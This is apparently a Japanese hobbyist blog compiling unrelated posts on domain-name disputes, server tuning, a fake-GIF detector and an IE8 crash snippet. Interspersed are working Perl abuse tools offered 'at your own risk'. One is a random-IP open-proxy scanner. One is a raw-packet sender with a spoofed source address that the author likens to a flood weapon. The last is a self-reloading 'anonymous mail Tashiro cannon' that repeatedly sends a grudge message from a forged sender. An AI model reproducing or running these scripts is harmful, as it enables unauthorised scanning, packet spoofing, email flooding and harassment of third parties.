SourceGetter　BLOG

昨日からの症状です(正確には今朝)

明朝からech0のトラフィックがなくなり、サーバ応答が不能になりました。

散々悩み抜いた挙句ルーター初期化で解決しました。

Webページにアクセスする際は殆どの場合

www.orenoatamahahageteru.com

などのURLを用いることが多いと思います。

このドメイン一つで裁判を起こされる例があります、ドメイン名紛争って奴です。

有名処では GOO.CO.JPを巡ったNTT-X社の裁判があります。

・そもそもドメイン紛争ってなに？

レジストラから正規に登録したドメイン名を巡った裁判、民事訴訟等の総括 総称(だと思います…)です。

商標権を侵害しているドメインは相当ヤバいです 特に.JPの場合はドメインの管理権自体を消される可能性が相当です。

・ドメイン紛争に抵触してしまう恐れのあるドメイン名は？

例えばですが、Doraemon.Jp(ドラえもん.ジェーピー) Suzumiya-haruhi.Jp(涼宮ハルヒ.ジェーピー)等のアニメキャラのドメイン。

YouTube.Ne.JP(ユーチューブ.エヌイー.ジェーピー) Google.Or.Jp(グーグル.オーアール.ジェーピー)等、この様なドメインを”正規の用途”で利用していない

(ウェブサイトを開設せずにドメインパーキングに転送する等)ドメインがこの対称となります。

・JPNICに通報されるとどうなるの？

ドメイン名を削除 あるいは強制的に移管されちゃいます。最悪の場合裁判に発展する事もあります ってかそんな事例がJPINCのドメイン紛争事例のページに腐るほど載ってます。

もしこの記事を回覧の方で、汎用JPドメインを取得する方はくれぐれも注意してくださいねっと。

なんとなく作って見ました、仕組みが適当なのでメモリばっかり食う可能性が高いです。

数分間で書いた上ほとんどデバッグしてません、使用は自己責任でどうぞ。

#!/usr/bin/perl

###
###   簡易Proxy検索CGI　Ver 0.01
###

##   Googleなどでそれらしきワード掛けても出てこないので作って見ました。
##    永久にテスト版なので、利用は自己責任でどうぞ
##

###　　仕組み ランダムな数字を生成させて 構築されたIPアドレスに対し
###　　8080 80 8000等の定番ポートへコネクションを試みます
###　　コネクション出来たらログに書き出す仕組みです
###　　※　ポートコネクションを行うので相当負担がかかります。
###　　　　スペックに自信がないなら使用しないことをおすすめします。

use LWP::UserAgent;
use HTTP::Request;

### 串のIPの種を作る
### 参考:http://chaichan.web.infoseek.co.jp/qa1500/qa1620.htm

### 10回まで繰り返す
### 回数制御は
###     ↓をいぢる
for(0..10) {

$qp1        = int(rand(99));
$kazu1        = int(rand(99));
$osimai1     = $qp1 + $kazu1;

$qp2        = int(rand(99));
$kazu2        = int(rand(99));
$osimai2    = $qp2 + $kazu2;

$qp3        = int(rand(99));
$kazu3        = int(rand(99));
$osimai3    = $qp3 + $kazu3;

$qp4        = int(rand(99));
$kazu4        = int(rand(99));
$osimai4    = $qp4 + $kazu4;

$ipdesuyo = "$osimai1.$osimai2.$osimai3.$osimai4";

$ua = new LWP::UserAgent;
$ua->agent ("Gojira");
$ua->timeout (30); ### 30sec待って応答がないなら 多分そのサーバは外れ

$request    = new HTTP::Request "GET","http://$ipdesuyo:80";
$response   = $ua->request ($request);
$response_body80 = $response->content();
$coder         = $response->code();

$request    = new HTTP::Request "GET","http://$ipdesuyo:8080";
$response   = $ua->request ($request);
$response_body8080 = $response->content();
$coder         = $response->code();

$request    = new HTTP::Request "GET","http://$ipdesuyo:8000";
$response   = $ua->request ($request);
$response_body8000 = $response->content();
$coder         = $response->code();

if ($coder =~ /200/) {### レスポンス200の場合はログを吐く

 open(OUT,">> ./proxy.txt");
 flock(OUT, 2);
 print OUT "$ipdesuyo<>$response_body80<>$response_body8080<>$response_body8000\n";
 close(OUT);
}

print $ipdesuyo;
}

[root@localhost ~]# free
 total       used       free     shared    buffers     cached
Mem:       3087544    2994924      92620          0      74336    1091808
-/+ buffers/cache:    1828780    1258764
Swap:      5177340       2300    5175040

apacheの子プロセスが原因なのだろうか・・・

今回は新機能のリリースです。

故 ソースチェッカーオンラインで有名な機能だった偽装GIF検出機能 及びモザイク画像の生成機能を

実装しました。

画像の拡張子が.JPG等にも関わらず中身がGIF動画である いわゆる偽装GIFを自動で検出します。

さらに画像をphpで動的に変換してモザイク画像を生成します。

例 (グロ注意)

http://bcc.dip.jp/?url=http%3A%2F%2Flivedoor.blogimg.jp%2Fwarosmani..

http://bcc.dip.jp/?url=http%3A%2F%2Faomori.cool.ne.jp%2Fhime5%2Fmi..

インストール時に詰んだのでメモ

まずflexをyumでインストールします、その後libcapを”ソースから”コンパイルしてインストールします。

/usr/include/にpcap~の名前のファイルがあることを確認します。

その後 Net::RawIPをcpanからwgetで入手します、適当なディレクトリに解凍し、

Perl Makefile.PL make make install　の手順でインストール出来ます。

試しに簡単なパケットを投げてみましょう

#!/usr/bin/perl

use strict;
use Net::RawIP;
my $sends = $ARGV[0];
my $kimip = $ARGV[1];

my $n = Net::RawIP->new({
 ip  => {
 saddr => $sends,
 daddr => $kimip,
 },
 });
 tcp => {
 source => 139,
 dest   => 139,
 psh    => 1,
 syn    => 1,
 };
$n->send;

print "飛ばせたよ～^o^";

Rawパケットを投げるのでroot権限が必要です。

perl send.pl google.jp google.jpのように入力して飛ばせたよ～^o^が表示されればOKです。

頑張れば簡易Proxyもどき見たいなことも・・・出来る？かもしれませんね。

なお当然ですがWindowsでは使えません。

※間違えてもforで無限ループするように組んではいけません、田代砲の方がまだマシな程の兵器になります。

IE8向けのクラッシュコードの模様です、多分対策されていると思いますが。。

下記のコードが脆弱性検証となっている模様です

IE8 Crasher

ttp://crashie8.com/

上記のサイトにこの様なコードが載っています

<div id="page_wrapper">
 <form id="apply-form" action="#" method="post">
 <div style="display:none"><input type="text" name="test"/></div>
 </div>

検証していないので不明ですが、おそらくIE8辺りに影響があるものと思われます。

負荷対策って奴です 多分相当軽いはずですが念のため導入しておきます。

my.cnfに以下の設定を追加してあります。

query_cache_limit=5M
query_cache_min_res_unit=1M
query_cache_size=32M
query_cache_type=1
key_buffer = 20M
sort_buffer_size = 5M
read_buffer_size = 2M

なんとなく作って見ました、常識の範囲で遊んでください。

(Perlモジュール Mail::Sendmailが必要です。)

#!/usr/bin/perl
=coment
 ～ 匿名メール田代砲 ～

 このスクリプトは、指定したメールアドレスに発信源不明のメールを打つスクリプトです、
 悪用防止の為、smtpサーバが無いと動かない仕組みになっています。
 またメール送りまくって回線止められたりしても私は一切知りません。

 作者:JNR ★
 HP:http://bcc.dip.jp/
 メール:bcc.dip.jp@gmail.com
=cut
use strict;
use Mail::Sendmail;

my $kaisuu = 80;#リロード秒数　と言ってもmeta リフレッシュだけど...

&mailmain();
&html();

sub mailmain
{
 my ($server, $to_addr, $from_addr, $mail_sub, $mail_body);
 $server     = "smtp.****.ocn.ne.jp"    ;#プロパイダのsmtpサーバ
 $to_addr    = "info\@gmail.com"    ;#メールを送る宛先
 $from_addr    = "info\@yahoo.co.jp"    ;#発信源メアド
 $mail_sub    = "日頃の恨みを晴らさせてもらおう";#メールタイトル
 $mail_body    = "はげはげはげはげはげはげはげは";#メール本文

 #教えてgooより
 my %mail = (

 Smtp => $server,

 "Content-Type" => 'text/plain; charset="JIS"',

 To => $to_addr,
 From => $from_addr,

 Subject => $mail_sub,
 Message => $mail_body,
 );

 sendmail(%mail);
}

sub html
{
 print qq|Content-type: text/html\n\n|;
 print <<"EOH";
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="ja">
<head>
<meta http-equiv="content-type" content="text/html; charset=Shift_JIS">
<meta http-equiv="Refresh" content="$kaisuu">
<title>OK</title>
</head>
<body>
OK
</body>
</html>
EOH
exit(0);
}
__END__

サーバ再インストールで放置していたブログ 再構築してみました。

前より早くなっていれば光栄です。